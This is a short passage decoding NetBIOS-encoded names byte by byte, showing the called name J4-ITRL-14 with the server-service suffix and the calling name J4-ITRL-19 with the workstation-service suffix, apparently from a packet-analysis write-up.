E K = 0x45-0x41, 0x4B-0x41 = 0x4, 0xA -> 0x4A = J
D E = 0x3, 0x4 -> 0x34 = 4
C N = 0x2, 0xD -> 0x2D = -
E J = 0x4, 0x9 -> 0x49 = I
F E = 0x5, 0x4 -> 0x54 = T
F C = 0x5, 0x2 -> 0x52 = R
E M = 0x4, 0xC -> 0x4C = L
C N = 0x2, 0xD -> 0x2D = -
D B = 0x3, 0x1 -> 0x31 = 1
D E = 0x3, 0x4 -> 0x34 = 4
C A (x5) = 0x2, 0x0 -> 0x20 = space padding to 15 characters
C A = 0x2, 0x0 -> 0x20 = 16th byte, the service suffix <20> (server service)

Calling name: J4-ITRL-19 (workstation service)
E K = 0x4, 0xA -> 0x4A = J
D E = 0x3, 0x4 -> 0x34 = 4
C N = 0x2, 0xD -> 0x2D = -
E J = 0x4, 0x9 -> 0x49 = I
F E = 0x5, 0x4 -> 0x54 = T
F C = 0x5, 0x2 -> 0x52 = R
E M = 0x4, 0xC -> 0x4C = L
C N = 0x2, 0xD -> 0x2D = -
D B = 0x3, 0x1 -> 0x31 = 1
D J = 0x3, 0x9 -> 0x39 = 9
C A (x5) = 0x2, 0x0 -> 0x20 = space padding to 15 characters
A A = 0x0, 0x0 -> 0x00 = 16th byte, the service suffix <00> (workstation service)

